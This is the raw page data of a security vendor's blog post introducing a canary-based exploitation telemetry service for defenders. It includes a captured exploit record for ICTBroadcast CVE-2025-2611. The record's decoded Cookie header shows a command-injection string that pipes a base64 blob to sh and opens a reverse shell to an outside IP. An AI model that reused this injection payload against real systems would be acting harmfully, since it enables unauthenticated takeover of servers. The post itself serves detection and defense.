.sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":28137},[],"2025-11-27","VulnCheck Canary Intelligence uncovered a long-running attacker-owned OAST service operating from Google Cloud. The actor blended stock Nuclei templates with custom payloads while focusing their activity on canaries deployed in a single region. This unusual combination reveals a structured, sustained scanning operation rather than ordinary opportunistic spraying.",{"slug":28141},"mystery-oast","\u002Fblog\u002Fmystery-oast",{"title":10793,"description":28139},"blog\u002Fmystery-oast",[2941,242,1279],"dosnKIlFnwaMV9j7u-0kHUpGko0M9C4KBi1d0axQD1I",{"id":28148,"title":28149,"articles":28150,"authors":28160,"body":28162,"date":29780,"description":29781,"extension":234,"image":7,"link":7,"meta":29782,"navigation":237,"path":29784,"seo":29785,"series":7,"stem":29786,"subtype":7,"tags":29787,"__hash__":29788},"blog\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence.md","Introducing VulnCheck Canary Intelligence",[28151,28155],{"title":28152,"source":14382,"link":28153,"date":28154},"Fortinet Warns of New FortiWeb CVE-2025-58034 Vulnerability Exploited in the Wild","https:\u002F\u002Fthehackernews.com\u002F2025\u002F11\u002Ffortinet-warns-of-new-fortiweb-cve-2025.html","2025-11-19",{"title":28156,"source":28157,"link":28158,"date":28159},"Endpoint Security and Network Monitoring News for the Week of November 21st","Solutions 
Review","https:\u002F\u002Fsolutionsreview.com\u002Fendpoint-security\u002Fendpoint-security-and-network-monitoring-news-for-the-week-of-november-21st\u002F","2025-11-21",[28161],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":28163,"toc":29769},[28164,28167,28173,28177,28189,28193,28200,28206,28217,28492,28499,28634,28637,28640,28654,28657,28661,28664,28668,28671,29374,29377,29383,29386,29389,29393,29400,29719,29721,29724,29738,29741,29750,29754,29766],[61,28165,19621],{"id":28166},"vulncheck-canary-intelligence",[18,28168,28169,28172],{},[47,28170,19621],{"href":28171},"\u002Fproduct\u002Fcanary-intelligence"," is a new offering that captures real-world exploitation as it happens. The dataset is built from a global network of intentionally vulnerable systems that we call canaries. Our canaries record live attacker activity including payloads, IP addresses, geolocation data, and exploited CVEs. This provides defenders with ground-truth visibility into what vulnerabilities are actively targeted in the wild. This isn’t theoretical, it’s verified exploitation telemetry from real attacks on real software.",[61,28174,28176],{"id":28175},"why-we-built-it","Why We Built It",[18,28178,28179,28180,28183,28184,28188],{},"VulnCheck believes the most important vulnerabilities are those actively exploited in the wild. Acting on that belief, we built Suricata and Snort rules for ",[47,28181,1245],{"href":1243,"rel":28182},[51]," to detect exploitation in network traffic. It’s also why we’ve invested so heavily in curating our freely available ",[47,28185,28187],{"href":10806,"rel":28186},[51],"VulnCheck Known Exploited Vulnerability"," (KEV) database. However, the public reporting that KEV relies on can sometimes trail behind real-world exploitation. Canaries close that gap by applying our network detection rules across the internet. 
Attacks observed by Canaries can appear in the VulnCheck KEV within minutes of exploitation, giving defenders critical time to respond to the vulnerabilities that actually matter.",[61,28190,28192],{"id":28191},"how-it-works","How It Works",[18,28194,28195,28196,28199],{},"VulnCheck canaries are a natural evolution of our product offering. Building on VulnCheck ",[47,28197,1245],{"href":1243,"rel":28198},[51],", which provides intentionally vulnerable Docker containers for customers to test exploits and detections, we’ve deployed these same systems across the Internet to observe how attackers interact with real software. Unlike a honeypot, which can be fingerprinted and intentionally evaded by threat actors, a canary always appears genuine, because it is.",[18,28201,28202],{},[68,28203],{"alt":19621,"src":28204,"width":28205},"\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence\u002Fvulncheck-canary-intelligence.png",1200,[18,28207,28208,28209,28212,28213,28216],{},"VulnCheck Canary Intelligence delivers detailed exploitation telemetry and makes it possible to infer associated Command & Control (C2) infrastructure. With this visibility, defenders can distinguish low-effort scans (e.g., Nuclei) from more advanced or targeted attacks. For example, VulnCheck was the first to ",[47,28210,5061],{"href":24024,"rel":28211},[51]," real exploitation of ",[47,28214,23717],{"href":23715,"rel":28215},[51],", an unauthenticated remote code execution vulnerability in ICTBroadcast call center software. 
The data we provide to VulnCheck Canary Intelligence customers looks like this:",[1354,28218,28220],{"className":22307,"code":28219,"language":22309,"meta":219,"style":219},"   {\n      \"src_ip\": \"159.65.227.190\",\n      \"src_port\": 38761,\n      \"src_country\": \"US\",\n      \"dst_country\": \"US\",\n      \"cve\": \"CVE-2025-2611\",\n      \"signature_id\": 12700629,\n      \"signature\": \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\",\n      \"category\": \"Web Application Attack\",\n      \"severity\": 1,\n      \"payload\": \"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV83KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMxLjAuMC4wIFNhZmFyaS81MzcuMzYNCkNvb2tpZTogQlJPQURDQVNUPWBlY2hvJHtJRlN9YzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRVNUxqWTFMakl5Tnk0eE9UQXZPVEE1TlNBd1BpWXh8YmFzZTY0JHtJRlN9LWR8c2hgDQoNCg==\",\n      \"http\": {\n        \"url\": \"\u002Flogin.php\",\n        \"http_user_agent\": \"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\",\n        \"protocol\": \"HTTP\u002F1.1\"\n      },\n      \"timestamp\": \"2025-11-01T12:03:20.969Z\"\n    },\n",[886,28221,28222,28227,28246,28261,28279,28297,28315,28329,28347,28365,28379,28398,28410,28429,28448,28464,28469,28486],{"__ignoreMap":219},[1373,28223,28224],{"class":1375,"line":1376},[1373,28225,28226],{"class":1383},"   
{\n",[1373,28228,28229,28231,28233,28235,28237,28239,28242,28244],{"class":1375,"line":220},[1373,28230,26357],{"class":9152},[1373,28232,23735],{"class":9155},[1373,28234,183],{"class":9152},[1373,28236,4606],{"class":1383},[1373,28238,4883],{"class":9173},[1373,28240,28241],{"class":9176},"159.65.227.190",[1373,28243,183],{"class":9173},[1373,28245,9062],{"class":1383},[1373,28247,28248,28250,28252,28254,28256,28259],{"class":1375,"line":1266},[1373,28249,26357],{"class":9152},[1373,28251,23754],{"class":9155},[1373,28253,183],{"class":9152},[1373,28255,4606],{"class":1383},[1373,28257,28258],{"class":5467}," 38761",[1373,28260,9062],{"class":1383},[1373,28262,28263,28265,28267,28269,28271,28273,28275,28277],{"class":1375,"line":1852},[1373,28264,26357],{"class":9152},[1373,28266,23770],{"class":9155},[1373,28268,183],{"class":9152},[1373,28270,4606],{"class":1383},[1373,28272,4883],{"class":9173},[1373,28274,23799],{"class":9176},[1373,28276,183],{"class":9173},[1373,28278,9062],{"class":1383},[1373,28280,28281,28283,28285,28287,28289,28291,28293,28295],{"class":1375,"line":4692},[1373,28282,26357],{"class":9152},[1373,28284,23790],{"class":9155},[1373,28286,183],{"class":9152},[1373,28288,4606],{"class":1383},[1373,28290,4883],{"class":9173},[1373,28292,23799],{"class":9176},[1373,28294,183],{"class":9173},[1373,28296,9062],{"class":1383},[1373,28298,28299,28301,28303,28305,28307,28309,28311,28313],{"class":1375,"line":4724},[1373,28300,26357],{"class":9152},[1373,28302,242],{"class":9155},[1373,28304,183],{"class":9152},[1373,28306,4606],{"class":1383},[1373,28308,4883],{"class":9173},[1373,28310,23717],{"class":9176},[1373,28312,183],{"class":9173},[1373,28314,9062],{"class":1383},[1373,28316,28317,28319,28321,28323,28325,28327],{"class":1375,"line":4756},[1373,28318,26357],{"class":9152},[1373,28320,23828],{"class":9155},[1373,28322,183],{"class":9152},[1373,28324,4606],{"class":1383},[1373,28326,23835],{"class":5467},[1373,28328,9062],{"class":1383},[1373,28
330,28331,28333,28335,28337,28339,28341,28343,28345],{"class":1375,"line":4768},[1373,28332,26357],{"class":9152},[1373,28334,23844],{"class":9155},[1373,28336,183],{"class":9152},[1373,28338,4606],{"class":1383},[1373,28340,4883],{"class":9173},[1373,28342,23853],{"class":9176},[1373,28344,183],{"class":9173},[1373,28346,9062],{"class":1383},[1373,28348,28349,28351,28353,28355,28357,28359,28361,28363],{"class":1375,"line":4792},[1373,28350,26357],{"class":9152},[1373,28352,23864],{"class":9155},[1373,28354,183],{"class":9152},[1373,28356,4606],{"class":1383},[1373,28358,4883],{"class":9173},[1373,28360,23873],{"class":9176},[1373,28362,183],{"class":9173},[1373,28364,9062],{"class":1383},[1373,28366,28367,28369,28371,28373,28375,28377],{"class":1375,"line":4798},[1373,28368,26357],{"class":9152},[1373,28370,23884],{"class":9155},[1373,28372,183],{"class":9152},[1373,28374,4606],{"class":1383},[1373,28376,5468],{"class":5467},[1373,28378,9062],{"class":1383},[1373,28380,28381,28383,28385,28387,28389,28391,28394,28396],{"class":1375,"line":4806},[1373,28382,26357],{"class":9152},[1373,28384,11736],{"class":9155},[1373,28386,183],{"class":9152},[1373,28388,4606],{"class":1383},[1373,28390,4883],{"class":9173},[1373,28392,28393],{"class":9176},"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV83KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMxLjAuMC4wIFNhZmFyaS81MzcuMzYNCkNvb2tpZTogQlJPQURDQVNUPWBlY2hvJHtJRlN9YzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRVNUxqWTFMakl5Tnk0eE9UQXZPVEE1TlNBd1BpWXh8YmFzZTY0JHtJRlN9LWR8c2hgDQoNCg==",[1373,28395,183],{"class":9173},[1373,28397,9062],{"class":1383},[1373,28399,28400,28402,28404,28406,28408],{"class":1375,"line":4817},[1373,28401,26357],{"class":9152},[1373,28403,6277],{"class":9155},[1373,28405,183],{"class":9152},[1373,28407,4606],{"class":1383},[1373,28409,4765],{"class":1383},[1373,28411,28412,28415,28417,28419,28421,28423,28425,28
427],{"class":1375,"line":4825},[1373,28413,28414],{"class":9152},"        \"",[1373,28416,7585],{"class":9165},[1373,28418,183],{"class":9152},[1373,28420,4606],{"class":1383},[1373,28422,4883],{"class":9173},[1373,28424,23938],{"class":9176},[1373,28426,183],{"class":9173},[1373,28428,9062],{"class":1383},[1373,28430,28431,28433,28435,28437,28439,28441,28444,28446],{"class":1375,"line":4835},[1373,28432,28414],{"class":9152},[1373,28434,23949],{"class":9165},[1373,28436,183],{"class":9152},[1373,28438,4606],{"class":1383},[1373,28440,4883],{"class":9173},[1373,28442,28443],{"class":9176},"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36",[1373,28445,183],{"class":9173},[1373,28447,9062],{"class":1383},[1373,28449,28450,28452,28454,28456,28458,28460,28462],{"class":1375,"line":4843},[1373,28451,28414],{"class":9152},[1373,28453,23969],{"class":9165},[1373,28455,183],{"class":9152},[1373,28457,4606],{"class":1383},[1373,28459,4883],{"class":9173},[1373,28461,26002],{"class":9176},[1373,28463,19057],{"class":9173},[1373,28465,28466],{"class":1375,"line":4849},[1373,28467,28468],{"class":1383},"      },\n",[1373,28470,28471,28473,28475,28477,28479,28481,28484],{"class":1375,"line":4877},[1373,28472,26357],{"class":9152},[1373,28474,23992],{"class":9155},[1373,28476,183],{"class":9152},[1373,28478,4606],{"class":1383},[1373,28480,4883],{"class":9173},[1373,28482,28483],{"class":9176},"2025-11-01T12:03:20.969Z",[1373,28485,19057],{"class":9173},[1373,28487,28488,28490],{"class":1375,"line":4915},[1373,28489,28032],{"class":1383},[1373,28491,9062],{"class":4640},[18,28493,28494,28495,28498],{},"In this event, we identified that 159.65.227.190 (US) targeted a canary in the US via ",[47,28496,23717],{"href":23715,"rel":28497},[51],". 
The payload field is base64-encoded to preserve special characters; when decoded, the request body shows the exploit delivered through the Cookie header:",[1354,28500,28502],{"className":22307,"code":28501,"language":22309,"meta":219,"style":219},"GET \u002Flogin.php HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\nCookie: BROADCAST=`echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTU5LjY1LjIyNy4xOTAvOTA5NSAwPiYx|base64${IFS}-d|sh`\n",[886,28503,28504,28511,28516,28562],{"__ignoreMap":219},[1373,28505,28506,28509],{"class":1375,"line":1376},[1373,28507,28508],{"class":4640},"GET \u002Flogin.php HTTP\u002F",[1373,28510,6295],{"class":5467},[1373,28512,28513],{"class":1375,"line":220},[1373,28514,28515],{"class":4640},"Host: VC_REDACTED\n",[1373,28517,28518,28521,28524,28527,28529,28532,28535,28537,28539,28542,28545,28548,28551,28553,28556,28559],{"class":1375,"line":1266},[1373,28519,28520],{"class":4640},"User-Agent: Mozilla\u002F",[1373,28522,28523],{"class":5467},"5.0",[1373,28525,28526],{"class":4640}," (Macintosh; Intel Mac OS X ",[1373,28528,24698],{"class":5467},[1373,28530,28531],{"class":4640},"_",[1373,28533,28534],{"class":5467},"15",[1373,28536,28531],{"class":4640},[1373,28538,423],{"class":5467},[1373,28540,28541],{"class":4640},") AppleWebKit\u002F",[1373,28543,28544],{"class":5467},"537.36",[1373,28546,28547],{"class":4640}," (KHTML, like Gecko) Chrome\u002F",[1373,28549,28550],{"class":5467},"131.0",[1373,28552,59],{"class":4640},[1373,28554,28555],{"class":5467},"0.0",[1373,28557,28558],{"class":4640}," Safari\u002F",[1373,28560,28561],{"class":5467},"537.36\n",[1373,28563,28564,28567,28569,28573,28576,28579,28581,28584,28586,28589,28592,28595,28597,28600,28602,28605,28607,28610,28612,28615,28617,28620,28623,28625,28627,28629,28631],{"class":1375,"line":1852},[1373,28565,28566],{"class":4640},"Cookie: 
BROADCAST=`echo$",[1373,28568,9149],{"class":1383},[1373,28570,28572],{"class":28571},"s4fT8","IFS",[1373,28574,28575],{"class":1383},"}",[1373,28577,28578],{"class":4640},"c",[1373,28580,353],{"class":5467},[1373,28582,28583],{"class":4640},"ggLWkgPiYgL",[1373,28585,353],{"class":5467},[1373,28587,28588],{"class":4640},"Rldi",[1373,28590,28591],{"class":5467},"90",[1373,28593,28594],{"class":4640},"Y",[1373,28596,491],{"class":5467},[1373,28598,28599],{"class":4640},"AvMTU",[1373,28601,401],{"class":5467},[1373,28603,28604],{"class":4640},"LjY",[1373,28606,467],{"class":5467},[1373,28608,28609],{"class":4640},"LjIyNy",[1373,28611,380],{"class":5467},[1373,28613,28614],{"class":4640},"xOTAvOTA",[1373,28616,401],{"class":5467},[1373,28618,28619],{"class":4640},"NSAwPiYx|base",[1373,28621,28622],{"class":5467},"64",[1373,28624,4644],{"class":4640},[1373,28626,9149],{"class":1383},[1373,28628,28572],{"class":28571},[1373,28630,28575],{"class":1383},[1373,28632,28633],{"class":4640},"-d|sh`\n",[18,28635,28636],{},"Decoded and interpreted, the attacker base64-decodes a payload and pipes it to sh, yielding a reverse shell back to 159.65.227.190:9095.",[18,28638,28639],{},"From a single record, Canary Intelligence customers can therefore:",[22,28641,28642,28645,28648,28651],{},[25,28643,28644],{},"Attribute activity to a source IP and country, and a targeted geography",[25,28646,28647],{},"Associate the IP with a specific CVE being exploited",[25,28649,28650],{},"Recover the raw payload and any embedded C2 addresses",[25,28652,28653],{},"Determine if the event was generated by a scanning tool like Nuclei or a true exploitation attempt",[18,28655,28656],{},"We expose Canary telemetry in five indices by retention window: vulncheck-canaries-3d, vulncheck-canaries-10d, vulncheck-canaries-30d, vulncheck-canaries-90d, and vulncheck-canaries (the full, historical index). 
Customers can query these indices via API or download offline backups for enrichment, correlation, and threat-hunting workflows.",[61,28658,28660],{"id":28659},"how-existing-vulncheck-products-are-updated","How Existing VulnCheck Products Are Updated",[18,28662,28663],{},"VulnCheck Canary Intelligence seamlessly integrates across the existing VulnCheck product line, expanding context and precision across datasets.",[993,28665,28667],{"id":28666},"vulncheck-community","VulnCheck Community",[18,28669,28670],{},"Canary exploitation data is now surfaced directly in the freely available VulnCheck Known Exploited Vulnerability (KEV). Each CVE entry includes links to relevant Canary observations, a new Boolean field reported_exploited_by_vulncheck_canaries. Here is an example using the KEV entry for CVE-2025-2611:",[1354,28672,28674],{"className":22307,"code":28673,"language":22309,"meta":219,"style":219},"{\n      \"vendorProject\": \"ICTBroadcast\",\n      \"product\": \"ICTBroadcast\",\n      \"shortDescription\": \"The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. 
This results in unauthenticated remote code execution in the session handling.\\n\\n\\n\\n\\nVersions 7.4 and below are known to be vulnerable.\",\n      \"vulnerabilityName\": \"  Improper Input Validation\",\n      \"required_action\": \"Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\",\n      \"knownRansomwareCampaignUse\": \"Unknown\",\n      \"cve\": [\n        \"CVE-2025-2611\"\n      ],\n      \"cwes\": [],\n      \"vulncheck_xdb\": [],\n      \"vulncheck_reported_exploitation\": [\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12\",\n          \"date_added\": \"2025-10-12T11:12:37.803Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fictbroadcast-kev\",\n          \"date_added\": \"2025-10-14T00:00:00Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-15\",\n          \"date_added\": \"2025-10-15T13:16:43.284Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-20\",\n          \"date_added\": \"2025-10-20T05:38:50.634Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-21\",\n          \"date_added\": \"2025-10-21T11:28:34.748Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-22\",\n          \"date_added\": \"2025-10-22T03:31:40.775Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-23\",\n          
\"date_added\": \"2025-10-23T06:40:46.346Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-29\",\n          \"date_added\": \"2025-10-29T10:01:15.64Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-01\",\n          \"date_added\": \"2025-11-01T12:03:20.969Z\"\n        },\n        {\n          \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-03\",\n          \"date_added\": \"2025-11-03T12:58:29.691Z\"\n        }\n      ],\n      \"reported_exploited_by_vulncheck_canaries\": true,\n      \"date_added\": \"2025-10-12T11:12:37.803Z\",\n      \"_timestamp\": \"2025-11-03T13:27:52.697389321Z\"\n    }\n  ]\n}\n",[886,28675,28676,28680,28699,28718,28744,28764,28784,28804,28816,28824,28829,28842,28854,28867,28871,28891,28908,28913,28917,28935,28952,28956,28960,28979,28996,29000,29004,29023,29040,29044,29048,29067,29084,29088,29092,29111,29128,29132,29136,29155,29172,29176,29180,29199,29216,29220,29224,29243,29259,29263,29267,29286,29303,29307,29311,29326,29344,29361,29365,29370],{"__ignoreMap":219},[1373,28677,28678],{"class":1375,"line":1376},[1373,28679,8904],{"class":1383},[1373,28681,28682,28684,28687,28689,28691,28693,28695,28697],{"class":1375,"line":220},[1373,28683,26357],{"class":9152},[1373,28685,28686],{"class":9155},"vendorProject",[1373,28688,183],{"class":9152},[1373,28690,4606],{"class":1383},[1373,28692,4883],{"class":9173},[1373,28694,24695],{"class":9176},[1373,28696,183],{"class":9173},[1373,28698,9062],{"class":1383},[1373,28700,28701,28703,28706,28708,28710,28712,28714,28716],{"class":1375,"line":1266},[1373,28702,26357],{"class":9152},[1373,28704,28705],{"class":9155},"product",[1373,28707,183],{"class":9152},[1373,28709,4606],{"class":1383},[1373,28711,4883],{"class"
:9173},[1373,28713,24695],{"class":9176},[1373,28715,183],{"class":9173},[1373,28717,9062],{"class":1383},[1373,28719,28720,28722,28725,28727,28729,28731,28734,28737,28740,28742],{"class":1375,"line":1852},[1373,28721,26357],{"class":9152},[1373,28723,28724],{"class":9155},"shortDescription",[1373,28726,183],{"class":9152},[1373,28728,4606],{"class":1383},[1373,28730,4883],{"class":9173},[1373,28732,28733],{"class":9176},"The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.",[1373,28735,28736],{"class":2326},"\\n\\n\\n\\n\\n",[1373,28738,28739],{"class":9176},"Versions 7.4 and below are known to be vulnerable.",[1373,28741,183],{"class":9173},[1373,28743,9062],{"class":1383},[1373,28745,28746,28748,28751,28753,28755,28757,28760,28762],{"class":1375,"line":4692},[1373,28747,26357],{"class":9152},[1373,28749,28750],{"class":9155},"vulnerabilityName",[1373,28752,183],{"class":9152},[1373,28754,4606],{"class":1383},[1373,28756,4883],{"class":9173},[1373,28758,28759],{"class":9176},"  Improper Input Validation",[1373,28761,183],{"class":9173},[1373,28763,9062],{"class":1383},[1373,28765,28766,28768,28771,28773,28775,28777,28780,28782],{"class":1375,"line":4724},[1373,28767,26357],{"class":9152},[1373,28769,28770],{"class":9155},"required_action",[1373,28772,183],{"class":9152},[1373,28774,4606],{"class":1383},[1373,28776,4883],{"class":9173},[1373,28778,28779],{"class":9176},"Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are 
unavailable.",[1373,28781,183],{"class":9173},[1373,28783,9062],{"class":1383},[1373,28785,28786,28788,28791,28793,28795,28797,28800,28802],{"class":1375,"line":4756},[1373,28787,26357],{"class":9152},[1373,28789,28790],{"class":9155},"knownRansomwareCampaignUse",[1373,28792,183],{"class":9152},[1373,28794,4606],{"class":1383},[1373,28796,4883],{"class":9173},[1373,28798,28799],{"class":9176},"Unknown",[1373,28801,183],{"class":9173},[1373,28803,9062],{"class":1383},[1373,28805,28806,28808,28810,28812,28814],{"class":1375,"line":4768},[1373,28807,26357],{"class":9152},[1373,28809,242],{"class":9155},[1373,28811,183],{"class":9152},[1373,28813,4606],{"class":1383},[1373,28815,26352],{"class":1383},[1373,28817,28818,28820,28822],{"class":1375,"line":4792},[1373,28819,28414],{"class":9173},[1373,28821,23717],{"class":9176},[1373,28823,19057],{"class":9173},[1373,28825,28826],{"class":1375,"line":4798},[1373,28827,28828],{"class":1383},"      ],\n",[1373,28830,28831,28833,28836,28838,28840],{"class":1375,"line":4806},[1373,28832,26357],{"class":9152},[1373,28834,28835],{"class":9155},"cwes",[1373,28837,183],{"class":9152},[1373,28839,4606],{"class":1383},[1373,28841,26338],{"class":1383},[1373,28843,28844,28846,28848,28850,28852],{"class":1375,"line":4817},[1373,28845,26357],{"class":9152},[1373,28847,22318],{"class":9155},[1373,28849,183],{"class":9152},[1373,28851,4606],{"class":1383},[1373,28853,26338],{"class":1383},[1373,28855,28856,28858,28861,28863,28865],{"class":1375,"line":4825},[1373,28857,26357],{"class":9152},[1373,28859,28860],{"class":9155},"vulncheck_reported_exploitation",[1373,28862,183],{"class":9152},[1373,28864,4606],{"class":1383},[1373,28866,26352],{"class":1383},[1373,28868,28869],{"class":1375,"line":4835},[1373,28870,9788],{"class":1383},[1373,28872,28873,28876,28878,28880,28882,28884,28887,28889],{"class":1375,"line":4843},[1373,28874,28875],{"class":9152},"          
\"",[1373,28877,7585],{"class":9165},[1373,28879,183],{"class":9152},[1373,28881,4606],{"class":1383},[1373,28883,4883],{"class":9173},[1373,28885,28886],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12",[1373,28888,183],{"class":9173},[1373,28890,9062],{"class":1383},[1373,28892,28893,28895,28897,28899,28901,28903,28906],{"class":1375,"line":4849},[1373,28894,28875],{"class":9152},[1373,28896,12998],{"class":9165},[1373,28898,183],{"class":9152},[1373,28900,4606],{"class":1383},[1373,28902,4883],{"class":9173},[1373,28904,28905],{"class":9176},"2025-10-12T11:12:37.803Z",[1373,28907,19057],{"class":9173},[1373,28909,28910],{"class":1375,"line":4877},[1373,28911,28912],{"class":1383},"        },\n",[1373,28914,28915],{"class":1375,"line":4915},[1373,28916,9788],{"class":1383},[1373,28918,28919,28921,28923,28925,28927,28929,28931,28933],{"class":1375,"line":4931},[1373,28920,28875],{"class":9152},[1373,28922,7585],{"class":9165},[1373,28924,183],{"class":9152},[1373,28926,4606],{"class":1383},[1373,28928,4883],{"class":9173},[1373,28930,24024],{"class":9176},[1373,28932,183],{"class":9173},[1373,28934,9062],{"class":1383},[1373,28936,28937,28939,28941,28943,28945,28947,28950],{"class":1375,"line":4947},[1373,28938,28875],{"class":9152},[1373,28940,12998],{"class":9165},[1373,28942,183],{"class":9152},[1373,28944,4606],{"class":1383},[1373,28946,4883],{"class":9173},[1373,28948,28949],{"class":9176},"2025-10-14T00:00:00Z",[1373,28951,19057],{"class":9173},[1373,28953,28954],{"class":1375,"line":4952},[1373,28955,28912],{"class":1383},[1373,28957,28958],{"class":1375,"line":6776},[1373,28959,9788],{"class":1383},[1373,28961,28962,28964,28966,28968,28970,28972,28975,28977],{"class":1375,"line":6781},[1373,28963,28875],{"class":9152},[1373,28965,7585],{"class":9165},[1373,28967,183],{"class":9152},[1373,28969,4606],{"class":1383},[1373,28971,4883],{"class":9173},[1373,28973,28974],{"class":917
6},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-15",[1373,28976,183],{"class":9173},[1373,28978,9062],{"class":1383},[1373,28980,28981,28983,28985,28987,28989,28991,28994],{"class":1375,"line":7524},[1373,28982,28875],{"class":9152},[1373,28984,12998],{"class":9165},[1373,28986,183],{"class":9152},[1373,28988,4606],{"class":1383},[1373,28990,4883],{"class":9173},[1373,28992,28993],{"class":9176},"2025-10-15T13:16:43.284Z",[1373,28995,19057],{"class":9173},[1373,28997,28998],{"class":1375,"line":7530},[1373,28999,28912],{"class":1383},[1373,29001,29002],{"class":1375,"line":7546},[1373,29003,9788],{"class":1383},[1373,29005,29006,29008,29010,29012,29014,29016,29019,29021],{"class":1375,"line":7571},[1373,29007,28875],{"class":9152},[1373,29009,7585],{"class":9165},[1373,29011,183],{"class":9152},[1373,29013,4606],{"class":1383},[1373,29015,4883],{"class":9173},[1373,29017,29018],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-20",[1373,29020,183],{"class":9173},[1373,29022,9062],{"class":1383},[1373,29024,29025,29027,29029,29031,29033,29035,29038],{"class":1375,"line":7598},[1373,29026,28875],{"class":9152},[1373,29028,12998],{"class":9165},[1373,29030,183],{"class":9152},[1373,29032,4606],{"class":1383},[1373,29034,4883],{"class":9173},[1373,29036,29037],{"class":9176},"2025-10-20T05:38:50.634Z",[1373,29039,19057],{"class":9173},[1373,29041,29042],{"class":1375,"line":7615},[1373,29043,28912],{"class":1383},[1373,29045,29046],{"class":1375,"line":7635},[1373,29047,9788],{"class":1383},[1373,29049,29050,29052,29054,29056,29058,29060,29063,29065],{"class":1375,"line":7640},[1373,29051,28875],{"class":9152},[1373,29053,7585],{"class":9165},[1373,29055,183],{"class":9152},[1373,29057,4606],{"class":1383},[1373,29059,4883],{"class":9173},[1373,29061,29062],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u00
